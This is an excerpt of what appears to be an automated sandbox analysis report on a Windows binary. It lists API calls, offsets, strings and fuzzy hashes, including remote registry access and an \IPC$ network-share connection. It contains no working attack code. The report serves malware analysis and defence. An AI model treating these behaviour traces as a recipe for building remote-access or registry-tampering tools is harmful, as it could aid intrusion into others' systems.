                • _free.LIBCMT ref: 0014DB9A
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                • String ID:
                • API String ID: 161543041-0
                • Opcode ID: 455c3444b639768d3ddb42487bc8a3e586a23d0d59b8ed93f656899140e7ea0f
                • Instruction ID: 1398c9005f09d16838f494e8e414bca8eb983cfbd0914609991c5b15662d064d
                • Opcode Fuzzy Hash: 455c3444b639768d3ddb42487bc8a3e586a23d0d59b8ed93f656899140e7ea0f
                • Instruction Fuzzy Hash: D8313B316047059FEF22AA39E845B5A77E9FF21315F65442AF449D72B1DF31AC80C721
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetClassNameW.USER32(?,?,00000100), ref: 0017369C
                • _wcslen.LIBCMT ref: 001736A7
                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00173797
                • GetClassNameW.USER32(?,?,00000400), ref: 0017380C
                • GetDlgCtrlID.USER32(?), ref: 0017385D
                • GetWindowRect.USER32(?,?), ref: 00173882
                • GetParent.USER32(?), ref: 001738A0
                • ScreenToClient.USER32(00000000), ref: 001738A7
                • GetClassNameW.USER32(?,?,00000100), ref: 00173921
                • GetWindowTextW.USER32(?,?,00000400), ref: 0017395D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                • String ID: %s%u
                • API String ID: 4010501982-679674701
                • Opcode ID: 1ea0a8b6edb41d93c7c1748281aa8577788b52a32a47cdce32748fa1e8968221
                • Instruction ID: 98942c81351f3d5b62260ffe648bf5879946c8b369171c2b080766dbab0c1f21
                • Opcode Fuzzy Hash: 1ea0a8b6edb41d93c7c1748281aa8577788b52a32a47cdce32748fa1e8968221
                • Instruction Fuzzy Hash: 71919171204606AFDB19DF24C885BEAF7B9FF44354F008629FAADD2190DB30EA45DB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetClassNameW.USER32(?,?,00000400), ref: 00174994
                • GetWindowTextW.USER32(?,?,00000400), ref: 001749DA
                • _wcslen.LIBCMT ref: 001749EB
                • CharUpperBuffW.USER32(?,00000000), ref: 001749F7
                • _wcsstr.LIBVCRUNTIME ref: 00174A2C
                • GetClassNameW.USER32(00000018,?,00000400), ref: 00174A64
                • GetWindowTextW.USER32(?,?,00000400), ref: 00174A9D
                • GetClassNameW.USER32(00000018,?,00000400), ref: 00174AE6
                • GetClassNameW.USER32(?,?,00000400), ref: 00174B20
                • GetWindowRect.USER32(?,?), ref: 00174B8B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                • String ID: ThumbnailClass
                • API String ID: 1311036022-1241985126
                • Opcode ID: f947db1d733193e58ce063a1809cf5775ed5dcefb8a92a0e56796b4b4adb162b
                • Instruction ID: 8bf1c63db054613192092902ab3f1040ed07b41a4857a35e5a57b5d67d1e5601
                • Opcode Fuzzy Hash: f947db1d733193e58ce063a1809cf5775ed5dcefb8a92a0e56796b4b4adb162b
                • Instruction Fuzzy Hash: A591BD711042059FDB09DF14C981BAAB7F9FF98314F04846AFD8A9B196EB30ED45CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00129BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00129BB2
                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001A8D5A
                • GetFocus.USER32 ref: 001A8D6A
                • GetDlgCtrlID.USER32(00000000), ref: 001A8D75
                • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 001A8E1D
                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 001A8ECF
                • GetMenuItemCount.USER32(?), ref: 001A8EEC
                • GetMenuItemID.USER32(?,00000000), ref: 001A8EFC
                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 001A8F2E
                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 001A8F70
                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001A8FA1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                • String ID: 0
                • API String ID: 1026556194-4108050209
                • Opcode ID: 60d054b62597221b9a12f629c808912f21aee436cefe8a857fdda61382f72837
                • Instruction ID: ec02e4ce0252e0169f50e26bf63b33b66bac1abf289c52ca5fa50006556687d0
                • Opcode Fuzzy Hash: 60d054b62597221b9a12f629c808912f21aee436cefe8a857fdda61382f72837
                • Instruction Fuzzy Hash: E581BF75608301AFDB10CF24D884AABBBE9FF9A314F04091DF985D7291DB30D941CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0017DC20
                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0017DC46
                • _wcslen.LIBCMT ref: 0017DC50
                • _wcsstr.LIBVCRUNTIME ref: 0017DCA0
                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0017DCBC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                • API String ID: 1939486746-1459072770
                • Opcode ID: dc5999f56f2fc0d46daae1f42a246cbdefb08ed2e139ce2d632b415a61a331b8
                • Instruction ID: a573922d628caa8c42e96aac70de26d3482947ffb1de90b8b56af1a3d2df7bab
                • Opcode Fuzzy Hash: dc5999f56f2fc0d46daae1f42a246cbdefb08ed2e139ce2d632b415a61a331b8
                • Instruction Fuzzy Hash: E04145329402147ADB15A7B0EC43EFF37BCEF66750F11406AF904A61C2EB719A0197B4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0019CC64
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0019CC8D
                • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0019CD48
                  • Part of subcall function 0019CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0019CCAA
                  • Part of subcall function 0019CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0019CCBD
                  • Part of subcall function 0019CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0019CCCF
                  • Part of subcall function 0019CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0019CD05
                  • Part of subcall function 0019CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0019CD28
                • RegDeleteKeyW.ADVAPI32(?,?), ref: 0019CCF3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                • String ID: RegDeleteKeyExW$advapi32.dll
                • API String ID: 2734957052-4033151799
                • Opcode ID: 3cc54da6406a506718d9b6910a9586e9e052af1182d96b25831f7232b2863c49
                • Instruction ID: cd58e2cd4200af753a2c23e93f5731b8ee6be2e75b4e41c81d6c4beb53f45e92
                • Opcode Fuzzy Hash: 3cc54da6406a506718d9b6910a9586e9e052af1182d96b25831f7232b2863c49
                • Instruction Fuzzy Hash: D8316E75A01229BBDB208B94DC88EFFBBBCEF56750F000165F945E2240DB349E85DAE0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00183D40
                • _wcslen.LIBCMT ref: 00183D6D
                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00183D9D
                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00183DBE
                • RemoveDirectoryW.KERNEL32(?), ref: 00183DCE
                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00183E55
                • CloseHandle.KERNEL32(00000000), ref: 00183E60
                • CloseHandle.KERNEL32(00000000), ref: 00183E6B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                • String ID: :$\$\??\%s
                • API String ID: 1149970189-3457252023
                • Opcode ID: 305c893fdb97dc234e428d6664e643e9f31f88bee30ae26bf872c4e2042784fe
                • Instruction ID: b622f09535f522f1408fcf332948ef2f00afbb8e00ce30f1caac93b84e176121
                • Opcode Fuzzy Hash: 305c893fdb97dc234e428d6664e643e9f31f88bee30ae26bf872c4e2042784fe
                • Instruction Fuzzy Hash: 7C31D471900109ABDB21ABA0DC48FEF37BDEF89B00F5441B6F515D6050EB7497858B64
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • timeGetTime.WINMM ref: 0017E6B4
                  • Part of subcall function 0012E551: timeGetTime.WINMM(?,?,0017E6D4), ref: 0012E555
                • Sleep.KERNEL32(0000000A), ref: 0017E6E1
                • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0017E705
                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0017E727
                • SetActiveWindow.USER32 ref: 0017E746
                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0017E754
                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0017E773
                • Sleep.KERNEL32(000000FA), ref: 0017E77E
                • IsWindow.USER32 ref: 0017E78A
                • EndDialog.USER32(00000000), ref: 0017E79B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                • String ID: BUTTON
                • API String ID: 1194449130-3405671355
                • Opcode ID: a0fd858774e034babba52c4d96d65f8cd4c8fb44c2273dcecc3c1b6c989f869e
                • Instruction ID: 97e13e954bb1f07789a76ec9b1b5df312fd1e0bd4e0cd840eb175f4ecb6b2f88
                • Opcode Fuzzy Hash: a0fd858774e034babba52c4d96d65f8cd4c8fb44c2273dcecc3c1b6c989f869e
                • Instruction Fuzzy Hash: 1D219670200245AFEF005FA4ECD9A293BFDF75D349F108465F91DC6AB1DBB1AD809AA4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0017EA5D
                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0017EA73
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0017EA84
                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0017EA96
                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0017EAA7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: SendString$_wcslen
                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                • API String ID: 2420728520-1007645807
                • Opcode ID: 81fe1ec653ee229606f08871e62947fdbb2e5040b0688bc2c6eb88f9cce53d0b
                • Instruction ID: 10c7d4a6f89562518433e95e79ec7e1d3aaf660148e07558348e6e15c0e36982
                • Opcode Fuzzy Hash: 81fe1ec653ee229606f08871e62947fdbb2e5040b0688bc2c6eb88f9cce53d0b
                • Instruction Fuzzy Hash: E7115131A902197DD728A7A5DC5ADFF6BBCEBD5B04F40042AB811A21D1EB701A45C5B0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetDlgItem.USER32(?,00000001), ref: 00175CE2
                • GetWindowRect.USER32(00000000,?), ref: 00175CFB
                • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00175D59
                • GetDlgItem.USER32(?,00000002), ref: 00175D69
                • GetWindowRect.USER32(00000000,?), ref: 00175D7B
                • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00175DCF
                • GetDlgItem.USER32(?,000003E9), ref: 00175DDD
                • GetWindowRect.USER32(00000000,?), ref: 00175DEF
                • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00175E31
                • GetDlgItem.USER32(?,000003EA), ref: 00175E44
                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00175E5A
                • InvalidateRect.USER32(?,00000000,00000001), ref: 00175E67
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$ItemMoveRect$Invalidate
                • String ID:
                • API String ID: 3096461208-0
                • Opcode ID: e1c0a83264a4ef02142a2e64b667d0ca1d51cbdee28b2d815d19254dfa79b892
                • Instruction ID: 7d6db8c9ce7b7c52b4f5659c6c1f4fc0f13a03c20f5964235ab14a008e454676
                • Opcode Fuzzy Hash: e1c0a83264a4ef02142a2e64b667d0ca1d51cbdee28b2d815d19254dfa79b892
                • Instruction Fuzzy Hash: F0510171B00605AFDF18CFA8DD89AAEBBB6FB48310F148129F519E7690D7709E44CB50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00128F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00128BE8,?,00000000,?,?,?,?,00128BBA,00000000,?), ref: 00128FC5
                • DestroyWindow.USER32(?), ref: 00128C81
                • KillTimer.USER32(00000000,?,?,?,?,00128BBA,00000000,?), ref: 00128D1B
                • DestroyAcceleratorTable.USER32(00000000), ref: 00166973
                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00128BBA,00000000,?), ref: 001669A1
                • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00128BBA,00000000,?), ref: 001669B8
                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00128BBA,00000000), ref: 001669D4
                • DeleteObject.GDI32(00000000), ref: 001669E6
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                • String ID:
                • API String ID: 641708696-0
                • Opcode ID: d1e50f87202f84d433ff6891285ce31f2a4ae7412d01246506989f17d4e53979
                • Instruction ID: 31283eda10cf8fc7aa77e247a6866db07b9ccc172f2dbb0e04bc1d881f8ec252
                • Opcode Fuzzy Hash: d1e50f87202f84d433ff6891285ce31f2a4ae7412d01246506989f17d4e53979
                • Instruction Fuzzy Hash: BC618A31502660EFDB259F64EE88B6AB7F1FB5131AF15451CE0429B961CB35ACF0CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00129944: GetWindowLongW.USER32(?,000000EB), ref: 00129952
                • GetSysColor.USER32(0000000F), ref: 00129862
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ColorLongWindow
                • String ID:
                • API String ID: 259745315-0
                • Opcode ID: b50fc5524f019da53d12898840b1d0ea8b7a0c761c71ab8e1d3ba2aba45eeef6
                • Instruction ID: 6c81700b9938d485880847a90ead8d8e0ecc0d1ed480b2a6603c9daaa1fc8ea4
                • Opcode Fuzzy Hash: b50fc5524f019da53d12898840b1d0ea8b7a0c761c71ab8e1d3ba2aba45eeef6
                • Instruction Fuzzy Hash: B841F531604654EFDB245F3CAC88BB93BA5EB17334F184645F9A2872E2C7309CA2DB50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0015F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00179717
                • LoadStringW.USER32(00000000,?,0015F7F8,00000001), ref: 00179720
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0015F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00179742
                • LoadStringW.USER32(00000000,?,0015F7F8,00000001), ref: 00179745
                • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00179866
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: HandleLoadModuleString$Message_wcslen
                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                • API String ID: 747408836-2268648507
                • Opcode ID: c4f9256377180118f66ddfe61a29ca290b38186770674984b362a7e0c12584af
                • Instruction ID: 325f1fb29809cac12facfbf127a9107e703b6477e02521dca19043fb075e45c3
                • Opcode Fuzzy Hash: c4f9256377180118f66ddfe61a29ca290b38186770674984b362a7e0c12584af
                • Instruction Fuzzy Hash: 5441417290021DAADF08EBE0DD96EEE7778AF25340F504035F61576092EB356F88CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00116B57: _wcslen.LIBCMT ref: 00116B6A
                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001707A2
                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001707BE
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001707DA
                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00170804
                • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0017082C
                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00170837
                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0017083C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                • API String ID: 323675364-22481851
                • Opcode ID: 6fde7e844d2f2613d2953930b3f169dfccdc9dfba6c1e91a3c8ddf595b13a6e5
                • Instruction ID: c67aec9e4202bd652a2935a85810715b16bdd5e5a3116a72cdec6e51eeed5c21
                • Opcode Fuzzy Hash: 6fde7e844d2f2613d2953930b3f169dfccdc9dfba6c1e91a3c8ddf595b13a6e5
                • Instruction Fuzzy Hash: FD411872C10229EBCF19EBA4DC95CEDB778BF18354F44412AF915A3161EB30AE84CB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VariantInit.OLEAUT32(?), ref: 00193C5C
                • CoInitialize.OLE32(00000000), ref: 00193C8A
                • CoUninitialize.OLE32 ref: 00193C94
                • _wcslen.LIBCMT ref: 00193D2D
                • GetRunningObjectTable.OLE32(00000000,?), ref: 00193DB1
                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00193ED5
                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00193F0E
                • CoGetObject.OLE32(?,00000000,001AFB98,?), ref: 00193F2D
                • SetErrorMode.KERNEL32(00000000), ref: 00193F40
                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00193FC4
                • VariantClear.OLEAUT32(?), ref: 00193FD8
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                • String ID:
                • API String ID: 429561992-0
                • Opcode ID: 25be4627a0f1724b0e83466090f397e2dd0d4bb636142495185efe2a5e10c554
